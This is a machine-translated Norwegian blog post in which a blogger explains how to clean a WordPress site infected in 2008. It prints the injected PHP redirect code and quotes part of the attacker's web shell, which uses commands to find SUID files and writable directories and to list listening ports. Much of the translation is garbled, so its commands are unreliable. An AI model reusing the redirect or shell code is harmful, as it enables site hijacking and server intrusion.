Siste måned, vi alle fått advarsler virus i bloggen fra noen besøkende. Utgangspunktet jeg ignorerte advarslene, fordi jeg hadde ganske god antivirus installert (Kaspersky AV 2009) Og selv blogg i lang tid, jeg har aldri fått et virus alert (lenge siden .. Jeg så noe mistanke om at den første refresh forsvant. Endelig ...).
Sakte begynte å vise store variasjoner besøkende trafikkEtter som det siste har falt jevnt og trafikken begynte å bli flere og flere mennesker som forteller meg at stealthsettings. Med den er Virus. I går fikk jeg fra noen et skjermbilde gjort når antivirus blokkert en script fra stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var overbevisende nok for meg at jeg skal ha søkt alle kilder. Den første tanken som kom til meg var å gjøre oppgradering den nyeste WordPress (2.5.1), men ikke før du sletter alle filene i det gamle skriptet WordPress og å lage backup database. Denne prosedyren virket ikke, og det tok meg sannsynligvis lang tid å finne ut hvor feilen var, hvis den ikke hadde fortalt meg. Eugen i en diskusjon over kaffe, fant han link Google og det ville være fint å se ham.
MyDigitalLife.info, publiserte en artikkel med tittelen: “WordPress Hack: Gjenopprett og fiks Google og søkemotor eller ingen informasjonskapseltrafikk omdirigert til Your-Needs.info, AnyResults.Net, Golden-Info.net og andre ulovlige nettsteder"Det er slutten av tråden jeg trengte.
Det handler om en utnytte de WordPress basert på informasjonskapslerSom jeg tror er svært kompleks og gjort boken. Smarte nok til å gjøre en SQL Injection Database blogg, å opprette en usynlig bruker en enkel rutinekontroll Dashbord->brukere, sjekk server kataloger og filer "skrivbare" (at chmod 777), for å søke og til henrette filer med rettighetene til gruppen eller roten. Jeg vet ikke hvem utnytte navnet og se at det er få artikler som er skrevet om ham, til tross for at mange blogger er smittet, inkludert Romania. Ok ... Jeg vil prøve å prøve å forklare generaliteter om viruset.
Hva er virus?
Først settes kilder sidene på blogger, lenker usynlig for besøkende, men synlig og indeksere for søkemotorer, særlig Google. På denne måten transfer Page Rank områder angitt av angriperen. For det andre settes det inn en annen omdirigering kode URL for besøkende som kommer fra Google, Live, Yahoo, ... eller en RSS-leser og ikke nettstedet i cookie. en antivirus oppdager viderekoblingen som Trojan-Clicker.HTML.
Symptomer:
Redusert massive besøkende trafikkSpesielt på blogger hvor de fleste besøkende kommer fra Google.
Identifikasjon: (det er her problemet blir komplisert for de som ikke kan mye om phpmyadmin, php og linux)
LA. ADVARSEL! Først gjøre en backup database!
1. Sjekk kildefilene index.php, header.php, footer.phpEr temaet for bloggen og se om det er en kode som bruker kryptering base64 eller inneholder “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”i form:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Eller noe. Slett denne koden!
Klikk på bildet ...
I skjermbildet ovenfor valgte jeg ved et uhell og " ". Den koden må forbli.
2. Bruk phpMyAdmin og gå til databasen tabellen wp_usersHvor sjekke om det er noen navn opprettet på 00:00:00 0000-00-00 (Mulig i feltet user_login å skrive "WordPress". Skriv ned denne brukerens ID (ID-felt) og slett den.
Klikk på bildet ...
* Den grønne linjen bør fjernes og beholdt sin ID. I tilfelle av søvnigVar ID = 8 .
3. Gå til Table wp_usermeta, Hvor du ligger og tørk linjer for ID (der feltet user_id ID-verdien fjernes).
4. I tabell wp_option, Å gå active_plugins og se hva plugin er aktivert mistenkte. Den kan brukes som avslutninger _old.giff, _old.pngg, _old.jpeg, _new.php.giffosv. kombinasjoner av rike bildeutvidelser med _old og _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Slett dette pluginet, og gå deretter til bloggen -> Dashboard -> Plugins, der du deaktiverer og aktiverer et plugin.
Klikk på bildet for å se det vises active_plugins virus fil.
Følg stien på FTP eller SSH, angitt i active_plugins og slette filen fra serveren.
5. Også i phpMyAdmin, i tabell wp_option, Finn og slette linjen som inneholder "rss_f541b3abd05e7962fcab37737f40fad8'Og'internal_links_cache ".
I internal_links_cache tilbød krypterte spam koblinger som vises i en blogg kode av Google Adsnakke, The hacker.
6. Anbefales å endre passord Blogg og pålogging fjerne alle mistenkelige userele. Oppgrader til siste versjon av WordPress og angi at bloggen ikke lenger lar nye brukere registrere seg. Det er ingen tap ... kan også kommentere ubebodd.
Jeg prøvde ovenfor å forklare litt, hva jeg skal gjøre i en slik situasjon, for å rense bloggen for dette viruset. Problemet er mye mer alvorlig enn det ser ut til og nesten ikke løst, fordi de brukes sikkerhetsproblemer hosting webserveren, som er blogg.
Som et første tiltak for sikkerhet, med tilgang SSH, Lag noen sjekker på serveren for å se om det er filer som * _old * og * _new. * Med avslutninger.GIFF,. jpeg,. pngg,. jpgg. Disse filene må slettes. Hvis du endrer navn på en fil, for eksempel. top_right_old.giff in top_right_old.phpVi ser at filen er nøyaktig skadelig kode server.
Noen nyttige instruksjoner for å sjekke, rengjøre og sikre serveren. (via SSH)
1. cd / tmp og sjekke om det er mapper som tmpVFlma eller andre kombinasjoner asemenatoare navn og slette den. Se skjermbilde nedenfor, to slike mapper til meg:
rm-rf mappenavn
2. Sjekk og eliminer (endre chmod-ul) som mulig mappene med attributter chmod 777
finn alle skrivbare filer i gjeldende dir: Finne. -Type f-perm-2-ls
finne alle skrivbare kataloger i dagens dir: Finne. -Type d-perm-2-ls
finn alle skrivbare kataloger og filer i gjeldende katalog: Finne. -Perm-2-ls
3. Ser etter mistenkelige filer på serveren.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, ADVARSEL! filene som har satt litt SUID si SGID. Disse filene kjøre med rettighetene til brukeren (gruppen) eller rot, ikke brukeren som utfører filen. Disse filene kan føre til rot kompromiss, hvis sikkerhetsspørsmål. Hvis du ikke bruker SUID og SGID filer med litt, utføre "chmod 0 " dem eller avinstallere pakken som inneholder dem.
Utnytte inneholder et sted i kilden ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Finner den måten ... utgangspunktet sikkerhetsbrudd. Porter åpne katalog "skrivbar" og gruppe gjennomføring privilegier filer / root.
Tilbake med mer ...
Noen blogger smittet: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Listen fortsetter ... mye.
Du kan sjekke om en blogg er infisert ved hjelp av Googles søkemotor. Kopier og lim inn:
Site: www.blegoo.com buy
God natt og godt arbeid;) Snart tror jeg Eugen kommer med nyheter, på prevezibil.imprevizibil.com.
brb :)
MERK FØLGENDE! Endring av tema for WordPress eller oppgradere til WordPress 2.5.1, er IKKE en løsning for å bli kvitt dette viruset.
